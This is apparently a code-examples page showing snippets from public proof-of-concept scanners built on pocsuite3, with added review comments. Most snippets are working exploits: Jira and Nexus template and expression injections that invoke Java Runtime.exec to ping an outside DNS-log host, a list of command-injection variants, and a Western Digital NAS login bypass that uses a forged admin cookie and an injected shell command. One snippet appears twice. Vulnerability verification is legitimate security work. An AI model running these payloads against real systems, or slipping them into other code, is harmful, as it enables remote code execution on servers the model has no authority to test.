How to use the pocsuite3.api.requests function in pocsuite3

To help you get started, we’ve selected a few pocsuite3 examples, based on popular ways it is used in public projects.


github knownsec / pocsuite3 / tests / login_demo.py View on Github external
def _verify(self):
    """Post the configured username/password and report a hit on HTTP 200.

    The form body is built by plain string formatting from the
    ``username`` and ``password`` options, sent to ``self.url``, and the
    response text is printed. When the status code is 200 the target URL
    and the exact body that was sent are recorded under ``VerifyInfo``.

    Returns:
        Whatever ``self.parse_output`` produces for the result dict
        (empty when the status code is not 200).
    """
    username = self.get_option("username")
    password = self.get_option("password")
    # NOTE(review): the values are interpolated as-is, without URL-encoding,
    # so a credential containing '&' or '=' changes the shape of the body.
    payload = "username={0}&password={1}".format(username, password)

    response = requests.post(self.url, data=payload)
    print(response.text)

    result = {}
    if response.status_code == 200:
        # NOTE(review): 'Postdata' holds the password in clear text, so any
        # report built from this result contains the credential.
        result['VerifyInfo'] = {'URL': self.url, 'Postdata': payload}

    return self.parse_output(result)
github shadowsock5 / Poc / Jira / Jira_poc.py View on Github external
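def _verify(self):
    """Send one templated contact-form request and confirm it out of band.

    A POST is made to ``/secure/ContactAdministrators.jspa`` under
    ``self.url`` with a template expression in the ``subject`` field. The
    target is reported only if ``self.test_dnslog`` then finds a record
    for ``self.BANNER`` at ``self.CEYE_URL``.

    Returns:
        The value of ``self.save_output(result)``; ``result`` carries
        ``VerifyInfo`` only when the DNS-log lookup succeeded.
    """
    # Local import: the file's import block is not visible from this block.
    import traceback

    result = {}
    target_url = self.url + "/secure/ContactAdministrators.jspa"
    headers = {"X-Atlassian-Token": "no-check"}

    payload = "$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('ping {0}.{1}').waitFor()".format(self.BANNER, self.DOMAIN)
    qparams = (('from','JIRA@JIRA.com'),('subject',payload),('details','details'),('Send','Send'))

    try:
        # verify=False disables TLS certificate validation for this request,
        # so the response is not authenticated; only the DNS-log lookup
        # below decides the outcome.
        req.post(target_url, headers = headers, data = qparams, proxies=self.proxies, verify=False, allow_redirects=False)
    except Exception:
        # Python exceptions have no printStackTrace(); calling it raised
        # AttributeError inside this handler and aborted the check.
        traceback.print_exc()

    time.sleep(2)  # wait 2s for ceye to register the DNS record
    # NOTE(review): a miss here can also mean the target cannot resolve
    # external names, so an empty result is not proof the host is patched.
    if self.test_dnslog(self.CEYE_URL):
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = target_url
    return self.save_output(result)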
github shadowsock5 / Poc / Nexus / Nexus_CVE_2020_10199.py View on Github external
}
        
        resp = None    # the response returned by the request
        
        
        l_auth_headers = self.get_auth_headers()

        # Try the request once per candidate auth header.
        for auth_header in l_auth_headers:
            # merge the auth request header into headers (mutates self.headers in place)
            self.headers.update(auth_header)
            # update the CSRF token (self.h, per the original comment)
            self.headers.update(self.h)
            
            try:
                # send the payload request
                resp = req.post(target_url, json=j, headers=self.headers)#, proxies={'http': 'http://127.0.0.1:8087'})

                if self.test_EL(resp):   # check whether the matching JSON field in the response shows the EL expression was evaluated
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target_url
                    # NOTE(review): the auth header that produced the hit is stored in the
                    # result, so saved output presumably contains credential material.
                    result['VerifyInfo']['Credentials'] = auth_header
                    return self.save_output(result)
                # NOTE(review): this return runs on the first attempt whenever test_EL
                # does not raise, so later auth headers are only tried after a
                # JSONDecodeError -- confirm that is intended.
                return self.save_output(result)
            except json.decoder.JSONDecodeError as e:
                # NOTE(review): resp is still None here if the error was raised before
                # req.post returned; resp.status_code would then fail.
                if resp.status_code == 401:
                    pass
                    #print("authentication failed")
                else:
                    logger.info("json解析失败")
                # a failure may only mean the password was wrong, so move on to the next one
                continue
            except Exception as e:
github shadowsock5 / Poc / Nexus / CVE-2020-11753.py View on Github external
},
                "recurringDays": [],
                "startDate": None,
                "timeZoneOffset": "+08:00"
              }
            ],
            "type": "rpc",
            "tid": 14
        }

        
        # Add whatever self.auth() returns to the shared request headers.
        self.headers.update(self.auth())

        # NOTE(review): pop() without a default raises KeyError when the header is absent.
        self.headers.pop('User-Agent')    # drop the default UA to avoid a CSRF error

        # First request: submit the task definition built above as JSON.
        resp = req.post(target_url, json=j, headers=self.headers, proxies=self.proxies)
        
        # extract the task id from the response
        task_id = self.get_task_id(resp)
        

        # Second request body: ask the coreui_Task "run" method to run that task id.
        j2 = {
            "action": "coreui_Task",
            "method": "run",
            "data": [
                task_id
            ],
            "type": "rpc",
            "tid": 17
        }

        # NOTE(review): the response to this call is discarded, so nothing in the
        # visible lines checks that the run request was accepted.
        req.post(target_url, json=j2, headers=self.headers, proxies=self.proxies)
github shadowsock5 / Poc / Nexus / Nexus_poc.py View on Github external
# Request headers and RPC-style JSON body; the "expression" filter value is
# formatted with self.BANNER and self.DOMAIN and tagged with type "jexl".
headers = {'Referer':''}
        j = {
            "action":"coreui_Component",
            "method":"previewAssets",
            "data":[
                {"page":1,"start":0,"limit":25,"filter":[
                    {"property":"repositoryName","value":"*"},
                    {"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('ping {0}.{1}').waitFor()".format(self.BANNER, self.DOMAIN)},
                    {"property":"type","value":"jexl"}]
                }
            ],
            "type":"rpc","tid":4}
        
        try:
            req.post(target_url, json=j, headers=headers, proxies=self.proxies)
        except Exception as e:
            # NOTE(review): printStackTrace() is a Java method; Python exceptions do not
            # have it, so this handler raises AttributeError when the request fails.
            e.printStackTrace()
        
        time.sleep(2) # sleep 2s to let ceye register the DNS record
        # The outcome is decided only by the DNS-log lookup, not by the HTTP response.
        if self.test_dnslog(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)
github knownsec / pocsuite3 / pocsuite3 / pocs / wd_nas_login_bypass_rce.py View on Github external
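def _verify(self):
    """Check the target by looking for /proc/cpuinfo field names in a reply.

    Two requests are sent: a GET to the ``network_mgr.cgi`` URL, whose
    response is ignored, then a POST to ``DsdkProxy.php`` carrying a fixed
    ``isAdmin=1;username=admin`` cookie and a body that wraps
    ``cat /proc/cpuinfo`` in ``';`` ... ``;'``. The target is reported when
    the POST response text contains any of the marker words.

    Returns:
        The value of ``self.parse_verify(result)``; ``result`` is empty
        when no marker was found or a request raised.
    """
    result = {}

    veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
    veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
    cmd = 'cat /proc/cpuinfo'
    data = "';{};'".format(cmd)
    headers = {'cookie': 'isAdmin=1;username=admin'}
    # NOTE(review): 'Hardware' and 'Revision' are ordinary words, so an
    # unrelated page that returns them would be reported as a hit.
    markers = ('Processor', 'BogoMIPS', 'Hardware', 'Revision')
    try:
        requests.get(veri_url1)
        resp = requests.post(veri_url2, data=data, headers=headers)
        if any(marker in resp.text for marker in markers):
            result['VerifyInfo'] = {'URL': self.url}
    except Exception as e:
        # Logger.warn is a deprecated alias; warning() is the supported name.
        logger.warning(str(e))
    return self.parse_verify(result)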
github knownsec / pocsuite3 / pocsuite3 / pocs / wd_nas_login_bypass_rce.py View on Github external
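def _verify(self):
    """Check the target by looking for /proc/cpuinfo field names in a reply.

    Two requests are sent: a GET to the ``network_mgr.cgi`` URL, whose
    response is ignored, then a POST to ``DsdkProxy.php`` carrying a fixed
    ``isAdmin=1;username=admin`` cookie and a body that wraps
    ``cat /proc/cpuinfo`` in ``';`` ... ``;'``. The target is reported when
    the POST response text contains any of the marker words.

    Returns:
        The value of ``self.parse_verify(result)``; ``result`` is empty
        when no marker was found or a request raised.
    """
    result = {}

    veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
    veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
    cmd = 'cat /proc/cpuinfo'
    data = "';{};'".format(cmd)
    headers = {'cookie': 'isAdmin=1;username=admin'}
    # NOTE(review): 'Hardware' and 'Revision' are ordinary words, so an
    # unrelated page that returns them would be reported as a hit.
    markers = ('Processor', 'BogoMIPS', 'Hardware', 'Revision')
    try:
        requests.get(veri_url1)
        resp = requests.post(veri_url2, data=data, headers=headers)
        if any(marker in resp.text for marker in markers):
            result['VerifyInfo'] = {'URL': self.url}
    except Exception as e:
        # Logger.warn is a deprecated alias; warning() is the supported name.
        logger.warning(str(e))
    return self.parse_verify(result)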
github shadowsock5 / Poc / Jira / Jira_poc.py View on Github external
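def test_dnslog(self, url):
    """Report whether the first DNS-log record name contains ``self.BANNER``.

    Args:
        url: DNS-log query URL; its response is parsed as JSON.

    Returns:
        True when ``data[0].name`` in the response contains
        ``self.BANNER``; False when it does not, or when the response has
        no such record. Earlier versions fell through and returned None on
        a non-matching name; callers that only test truthiness see no
        difference.

    Raises:
        Whatever ``req.get`` or ``resp.json()`` raise; a failed or
        non-JSON lookup is not reported as "no record".
    """
    resp = req.get(url)
    d = resp.json()
    try:
        # Only the first record is inspected.
        name = d['data'][0]['name']
        return self.BANNER in name
    except (KeyError, IndexError, TypeError):
        # Missing or empty 'data', or a record without a usable 'name'.
        return False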
github shadowsock5 / Poc / Nexus / Nexus_poc.py View on Github external
# Command-string templates to try in turn; the {0}.{1} placeholders are not
# filled in here (presumably get_json_payload does that -- confirm).
l_payload = [
            "ping {0}.{1}", 
            "ping {0}.{1} & /createrepo",
            "ping {0}.{1} ; /createrepo",
            "ping {0}.{1} | /createrepo",
            "ping {0}.{1} || /createrepo",
        ]

        vul_url = self.get_vul_url(capa_id_url, headers)

        target_url = vul_url
        
        # One try block wraps the whole loop, so the first request that raises
        # also skips every remaining template.
        try:
            for i in range(len(l_payload)):
                json_payload = self.get_json_payload(l_payload[i])
                req.put(target_url, json=json_payload, headers=headers, proxies=self.proxies)
        except Exception as e:
            # NOTE(review): printStackTrace() is a Java method; Python exceptions do not
            # have it, so this handler raises AttributeError when a request fails.
            e.printStackTrace()
        
        time.sleep(2) # sleep 2s to let ceye register the DNS record
        # The outcome is decided only by the DNS-log lookup, not by the HTTP responses.
        if self.test_dnslog(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)
github shadowsock5 / Poc / Nexus / Nexus_CVE_2020_10204.py View on Github external
"type":"rpc","tid":4}
        
        resp = None    # the response returned by the request
        
        
        l_auth_headers = self.get_auth_headers()

        # Try the request once per candidate auth header.
        for auth_header in l_auth_headers:
            # merge the auth request header into headers (mutates self.headers in place)
            self.headers.update(auth_header)
            # update the CSRF token (self.h, per the original comment)
            self.headers.update(self.h)
            
            try:
                # send the payload request
                resp = req.post(target_url, json=j, headers=self.headers)#, proxies={'http': 'http://127.0.0.1:8087'})

                if self.test_EL(resp):   # check whether the matching JSON field in the response shows the EL expression was evaluated
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target_url
                    return self.save_output(result)
                # NOTE(review): this return runs on the first attempt whenever test_EL
                # does not raise, so later auth headers are only tried after an
                # exception -- confirm that is intended.
                return self.save_output(result)
            except json.decoder.JSONDecodeError as e:
                # NOTE(review): resp is still None here if the error was raised before
                # req.post returned; resp.status_code would then fail.
                if resp.status_code == 401:
                    pass
                    #print("authentication failed")
                else:
                    logger.info("json解析失败")
                # a failure may only mean the password was wrong, so move on to the next one
                continue
            except Exception as e:
                # Any other error is logged and the loop moves on to the next auth header.
                logger.error(e)